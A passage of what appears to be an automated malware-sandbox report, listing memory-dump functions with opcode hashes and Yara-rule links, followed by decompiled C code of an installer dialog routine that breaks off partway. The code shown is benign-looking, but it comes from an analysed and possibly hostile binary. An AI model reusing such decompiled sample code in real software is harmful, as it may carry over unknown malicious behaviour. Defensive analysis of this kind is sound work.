                                                                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                    • Instruction ID: 3607a3fab124ee9f33bd83b0ff3401ba49d8faef31c9cba8819aa20a4c6851ca
                                                                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                    • Instruction Fuzzy Hash: 2FC02B71150440BBDB152F30CE11F15B358FB41B21F6403547220464F1E7689C00D100
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AA3A1C, Relevance: .0, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                    • Instruction ID: bbdbca8dffb01d0b9c99b94ad80cef8c53e7a80f7f73be6bffd63ee88cd63264
                                                                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                    • Instruction Fuzzy Hash: BDC04C32180648BBC7126E45DD01F15BB69E795B60F154021B6040B5A19676ED61D598
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AA7D50, Relevance: .0, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                    • Instruction ID: 6dd0316b3980bac278b4d8465f675d5d7dccc0b2848bea1154c3675283c6c070
                                                                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                    • Instruction Fuzzy Hash: 6EB092343019408FCE16DF18C480B1A33E4BB45B40B8400D4E400CBA20D329E8008900
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB2ACB, Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                    • Instruction ID: c55814afe809f8b2f1ba5cb9333164bdeb7c6fb2b93da495ffee96f8a564930f
                                                                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                    • Instruction Fuzzy Hash: 8EB01232E10440CFCF02EF40C710B197371FB00750F058490A00127D32C229AC01CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC98A0, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03c2c12e6da857d2474141b53c91f73d45bae9fffba0998c61129a6de7e592c7
                                                                                                    • Instruction ID: 50715ec7450419745d7ad88530808b1625dba70c6c52bf158108d22a4911f71e
                                                                                                    • Opcode Fuzzy Hash: 03c2c12e6da857d2474141b53c91f73d45bae9fffba0998c61129a6de7e592c7
                                                                                                    • Instruction Fuzzy Hash: E190026535100402D202616944146061009D7D1385F91C023E1424565D86658953F172
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9820, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 934ff10ed9855292ad93f4fe190d29d787c40275f863da1c9f44ba1f2c3c0a28
                                                                                                    • Instruction ID: bb964a608e2ae1fb4613326954d0bf06f6c1028ee43b94858327c99dc23e9d84
                                                                                                    • Opcode Fuzzy Hash: 934ff10ed9855292ad93f4fe190d29d787c40275f863da1c9f44ba1f2c3c0a28
                                                                                                    • Instruction Fuzzy Hash: 5090027529100402D241716944046061009A7D0381F91C023A0424564E86958A56FAA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ACB040, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0abad72a0b830361b383c15de85e6ec05ef8dcecb67f9fb5e563ed491fc69de8
                                                                                                    • Instruction ID: 4e65b696aa7fc3889e9e9c458a98f3fb68dd50c81cabd24ca3008ab78b2e671c
                                                                                                    • Opcode Fuzzy Hash: 0abad72a0b830361b383c15de85e6ec05ef8dcecb67f9fb5e563ed491fc69de8
                                                                                                    • Instruction Fuzzy Hash: AC9002A5651140434640B16948044066015A7E1341791C132A0454570C86A88855E2A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC95F0, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5c9db78364ffe5c256c54f735010e00b0c831ccd2abcba4075ce32ea76d8a0ea
                                                                                                    • Instruction ID: 03eb5c94bea1d270686b27ef1fb8e5562f6b24b72aebd07de827eaa7154265bd
                                                                                                    • Opcode Fuzzy Hash: 5c9db78364ffe5c256c54f735010e00b0c831ccd2abcba4075ce32ea76d8a0ea
                                                                                                    • Instruction Fuzzy Hash: 8C90027525100802D20461694804686100597D0341F51C022A6024665E96A58891B171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC99D0, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc8006e4386650b1b7e96f204f07cd33309ac74bf8635c4a75adb418057c9696
                                                                                                    • Instruction ID: d9f2746649889e481dd8003ef33e1afcfe47d8959f0d3614ac0cc9f5b37be697
                                                                                                    • Opcode Fuzzy Hash: dc8006e4386650b1b7e96f204f07cd33309ac74bf8635c4a75adb418057c9696
                                                                                                    • Instruction Fuzzy Hash: 1D9002A526100042D20461694404706104597E1341F51C023A2154564CC5698C61A165
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9520, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f56d09d15942aafc4160f43664c51c6672d5b9473518780964f095c34b6649c
                                                                                                    • Instruction ID: 7bf0f105a1835c3b2790d97d0d52ae50c251844a134d1f6967268721e24e1ca3
                                                                                                    • Opcode Fuzzy Hash: 5f56d09d15942aafc4160f43664c51c6672d5b9473518780964f095c34b6649c
                                                                                                    • Instruction Fuzzy Hash: C29002E5251140924600A2698404B0A550597E0341F51C027E1054570CC5658851E175
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ACAD30, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7ec59f1d49e331b322d5606a14100ed85ac5d7ce219ed783eaf83340992ef3a
                                                                                                    • Instruction ID: a8f879e7ec1a70e9058bc2717183a513ecb412dd80296b189915ecd5542cf7d7
                                                                                                    • Opcode Fuzzy Hash: b7ec59f1d49e331b322d5606a14100ed85ac5d7ce219ed783eaf83340992ef3a
                                                                                                    • Instruction Fuzzy Hash: A2900275A55000129240716948146465006A7E0781F55C022A0514564C89948A55A3E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9560, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: caf9c15c299bb4b8bf222236727eb37698fa0ed9ad40a793a1d152b12fd682d2
                                                                                                    • Instruction ID: b88bae39a389be1eaf8818fcb179f2c3d5f72d2a494b49dacb5559f8b64c889a
                                                                                                    • Opcode Fuzzy Hash: caf9c15c299bb4b8bf222236727eb37698fa0ed9ad40a793a1d152b12fd682d2
                                                                                                    • Instruction Fuzzy Hash: 87900269271000020245A569060450B1445A7D6391791C026F14165A0CC6618865A361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9950, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8d834338ee4cfee2dc7c753aec1aee4cc7f215662ef6365a5dce341c9ccfc0be
                                                                                                    • Instruction ID: f52a2d325d08e5038e1586fb6665cb3a83b2562f83c6555c441903443202ca61
                                                                                                    • Opcode Fuzzy Hash: 8d834338ee4cfee2dc7c753aec1aee4cc7f215662ef6365a5dce341c9ccfc0be
                                                                                                    • Instruction Fuzzy Hash: 4E9002A525140403D24065694804607100597D0342F51C022A2064565E8A698C51B175
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9A80, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b70079c92275d842a0065bd80a91cadc627499569feca603810f84d1805d6af8
                                                                                                    • Instruction ID: 4e33845e73c4518cf421cc38428d06e6f7f53631a88fe47200f976b62b7f77d5
                                                                                                    • Opcode Fuzzy Hash: b70079c92275d842a0065bd80a91cadc627499569feca603810f84d1805d6af8
                                                                                                    • Instruction Fuzzy Hash: F490026525144442D24062694804B0F510597E1342F91C02AA4156564CC9558855A761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC96D0, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 150b5a075657cb478b05f0e972c733eb891851153b359f3a44cb589731f31585
                                                                                                    • Instruction ID: 3daf4fe9115929a16542e9b556d423a69ed97acf74e5043e7d8ca4095a42789b
                                                                                                    • Opcode Fuzzy Hash: 150b5a075657cb478b05f0e972c733eb891851153b359f3a44cb589731f31585
                                                                                                    • Instruction Fuzzy Hash: BC90027525100842D20061694404B46100597E0341F51C027A0124664D8655C851B561
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9A10, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 843006375817b06bf6357f09113a6dc90ac333834da3e1a8a5e0456364eeb7b4
                                                                                                    • Instruction ID: 41d56e4a0189083039d7dbc5992998f8cdf21576cd027ea05581619d103094e6
                                                                                                    • Opcode Fuzzy Hash: 843006375817b06bf6357f09113a6dc90ac333834da3e1a8a5e0456364eeb7b4
                                                                                                    • Instruction Fuzzy Hash: 5590027525140402D20061694808747100597D0342F51C022A5164565E86A5C891B571
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9610, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b782014bdedc1676157ce5b8c6f68a997e1a909ecbd7a458ad050df07fe4be78
                                                                                                    • Instruction ID: 7f761bcc3c2090dc4e9cbe9eb9bac5a205a632ce6366535dd29564df1cef3d28
                                                                                                    • Opcode Fuzzy Hash: b782014bdedc1676157ce5b8c6f68a997e1a909ecbd7a458ad050df07fe4be78
                                                                                                    • Instruction Fuzzy Hash: 3890027565500802D25071694414746100597D0341F51C022A0024664D87958A55B6E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9650, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2cd4c5e1135e2d53eb2ae8bd311e47c5c69492d80d2e9062b43aa5d4e307263
                                                                                                    • Instruction ID: d7acd788b2a29f100ec41135dafa82b16f986fed5ffc51701c14efe99f64de25
                                                                                                    • Opcode Fuzzy Hash: e2cd4c5e1135e2d53eb2ae8bd311e47c5c69492d80d2e9062b43aa5d4e307263
                                                                                                    • Instruction Fuzzy Hash: C590027525504842D24071694404A46101597D0345F51C022A00646A4D96658D55F6A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ACA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8a5bdeff95f97ee4cc58bb9b7a565c6313923b578c604aa8034db8f4cb86217d
                                                                                                    • Instruction ID: 88c880201b1d1c18b9924c59945e7724dd45abf9b2778c5d6ff134b0b2b3c3b4
                                                                                                    • Opcode Fuzzy Hash: 8a5bdeff95f97ee4cc58bb9b7a565c6313923b578c604aa8034db8f4cb86217d
                                                                                                    • Instruction Fuzzy Hash: 4F90027525144002D2407169844460B6005A7E0341F51C422E0425564C86558856E261
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9730, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c14cfdde67c7fa2889312261204f3a884b648aad928350086c2531331e921979
                                                                                                    • Instruction ID: c93930120af85f997d092a2d5285e191c8d0d69c9e2968ce71e3cbb09cf6cb23
                                                                                                    • Opcode Fuzzy Hash: c14cfdde67c7fa2889312261204f3a884b648aad928350086c2531331e921979
                                                                                                    • Instruction Fuzzy Hash: 5D90026565500402D24071695418706101597D0341F51D022A0024564DC6998A55B6E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9B00, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2003a09ceb37d97045a439ee8c2ba9976008b071474ba903ee42863cb8606566
                                                                                                    • Instruction ID: 544dedbf5785fb387949e843da9dfe9357ab4217f80bf9ba45364618e931e710
                                                                                                    • Opcode Fuzzy Hash: 2003a09ceb37d97045a439ee8c2ba9976008b071474ba903ee42863cb8606566
                                                                                                    • Instruction Fuzzy Hash: FB90026529100802D240716984147071006D7D0741F51C022A0024564D86568965B6F1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ACA710, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2cc47e18b5a28de99ed3b724327b4a105893306bca779dcdbe03c688c366efb
                                                                                                    • Instruction ID: e2fe6090166687929f61ee6f60ba8ab53d39f19f875100c24aa4f7f7b80a9ff6
                                                                                                    • Opcode Fuzzy Hash: a2cc47e18b5a28de99ed3b724327b4a105893306bca779dcdbe03c688c366efb
                                                                                                    • Instruction Fuzzy Hash: F1900275351000529600A6A95804A4A510597F0341F51D026A4014564C85948861A161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9760, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5fd6b9562ab2a016ce9c2a2f68d56efa5b3f6bf0df56649b304799786074274b
                                                                                                    • Instruction ID: c1f13e513900232cbd79ee8c0ab79cd5439ffb9081eaaf7e55345488f035db52
                                                                                                    • Opcode Fuzzy Hash: 5fd6b9562ab2a016ce9c2a2f68d56efa5b3f6bf0df56649b304799786074274b
                                                                                                    • Instruction Fuzzy Hash: 4790027525100403D20061695508707100597D0341F51D422A0424568DD6968851B161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ACA770, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d693e3c079abca25a7a99de9199e01112df6fd24329a1666859a54ded713b056
                                                                                                    • Instruction ID: e9e957ca9ee1fc093173c473e039bd5629c37cd64b02de064d984446531cca20
                                                                                                    • Opcode Fuzzy Hash: d693e3c079abca25a7a99de9199e01112df6fd24329a1666859a54ded713b056
                                                                                                    • Instruction Fuzzy Hash: 7E90027925504442D60065695804A87100597D0345F51D422A04245ACD86948861F161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9770, Relevance: .0, Instructions: 4COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f9858b55f192dea5d6007a2827dfd5ad25f272eb1610f11e93ceeef151878b92
                                                                                                    • Instruction ID: ff978a9633e26aee0f3177da750ffb44ae941ec073f87de8089cbeabf824f45a
                                                                                                    • Opcode Fuzzy Hash: f9858b55f192dea5d6007a2827dfd5ad25f272eb1610f11e93ceeef151878b92
                                                                                                    • Instruction Fuzzy Hash: DC90026525504442D20065695408A06100597D0345F51D022A10645A5DC6758851F171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC9670, Relevance: .0, Instructions: 2COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                    • Instruction ID: e4e484a600425e4e2f3d2455c9f5d9c91bd5f31955e5dd26f54a8110e14ce109
                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
